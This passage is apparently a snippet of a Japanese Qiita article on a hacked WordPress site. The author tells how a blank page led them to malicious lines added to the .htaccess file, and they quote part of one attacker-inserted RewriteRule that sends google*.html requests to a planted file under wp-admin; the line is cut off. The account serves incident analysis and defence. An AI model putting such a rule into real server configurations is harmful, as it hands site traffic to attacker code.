と、記載してみた。 正常に動作するようであれば、少なくとも Referer is XXXXX と表示されるはず・・・ しかし依然として真っ白なページで、ページソース確認でも、確認できませんでした。 wordpressの仕組み上、少なくともwp/index.phpは実行されるはずで、URL直アクセスする場合は 想定通り、Referer is XXXXXと表示されることを確認しました。 上記の結果からおそらく、index.phpを経由していないと仮定し、これより上の処理を確認しました。 この判断がビンゴで、.htaccess内に悪意のあるコードが埋まっていました。 .htaccessの中身 通常のwordpressに存在しない、下記の内容が追加されていました。 RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-
![ハッキングされたWordpressから難読化されたコードを見つけた件 - Qiita](https://cdn-ak-scissors.b.st-hatena.com/image/square/a03fc74f4b9b6a1538b0c874a989b0defdbe143b/height=288;version=1;width=512/https%3A%2F%2Fqiita-user-contents.imgix.net%2Fhttps%253A%252F%252Fcdn.qiita.com%252Fassets%252Fpublic%252Farticle-ogp-background-9f5428127621718a910c8b63951390ad.png%3Fixlib%3Drb-4.0.0%26w%3D1200%26mark64%3DaHR0cHM6Ly9xaWl0YS11c2VyLWNvbnRlbnRzLmltZ2l4Lm5ldC9-dGV4dD9peGxpYj1yYi00LjAuMCZ3PTkxNiZoPTMzNiZ0eHQ9JUUzJTgzJThGJUUzJTgzJTgzJUUzJTgyJUFEJUUzJTgzJUIzJUUzJTgyJUIwJUUzJTgxJTk1JUUzJTgyJThDJUUzJTgxJTlGV29yZHByZXNzJUUzJTgxJThCJUUzJTgyJTg5JUU5JTlCJUEzJUU4JUFBJUFEJUU1JThDJTk2JUUzJTgxJTk1JUUzJTgyJThDJUUzJTgxJTlGJUUzJTgyJUIzJUUzJTgzJUJDJUUzJTgzJTg5JUUzJTgyJTkyJUU4JUE2JThCJUUzJTgxJUE0JUUzJTgxJTkxJUUzJTgxJTlGJUU0JUJCJUI2JnR4dC1jb2xvcj0lMjMyMTIxMjEmdHh0LWZvbnQ9SGlyYWdpbm8lMjBTYW5zJTIwVzYmdHh0LXNpemU9NTYmdHh0LWNsaXA9ZWxsaXBzaXMmdHh0LWFsaWduPWxlZnQlMkN0b3Amcz05OWNmODBhYzBhMGQwNWFiZTg0YTQ5MmQ1NzZlNDMyYw%26mark-x%3D142%26mark-y%3D112%26blend64%3DaHR0cHM6Ly9xaWl0YS11c2VyLWNvbnRlbnRzLmltZ2l4Lm5ldC9-dGV4dD9peGxpYj1yYi00LjAuMCZ3PTYxNiZ0eHQ9JTQwbWlra2FtZSZ0eHQtY29sb3I9JTIzMjEyMTIxJnR4dC1mb250PUhpcmFnaW5vJTIwU2FucyUyMFc2JnR4dC1zaXplPTM2JnR4dC1hbGlnbj1sZWZ0JTJDdG9wJnM9OWFhNGVjOTJmNzY4ZmQ1ZDg5ZGRjMzk3Y2M3NjEwNGQ%26blend-x%3D142%26blend-y%3D491%26blend-mode%3Dnormal%26s%3D5ca817f358e9e15271a19473e54a8c77)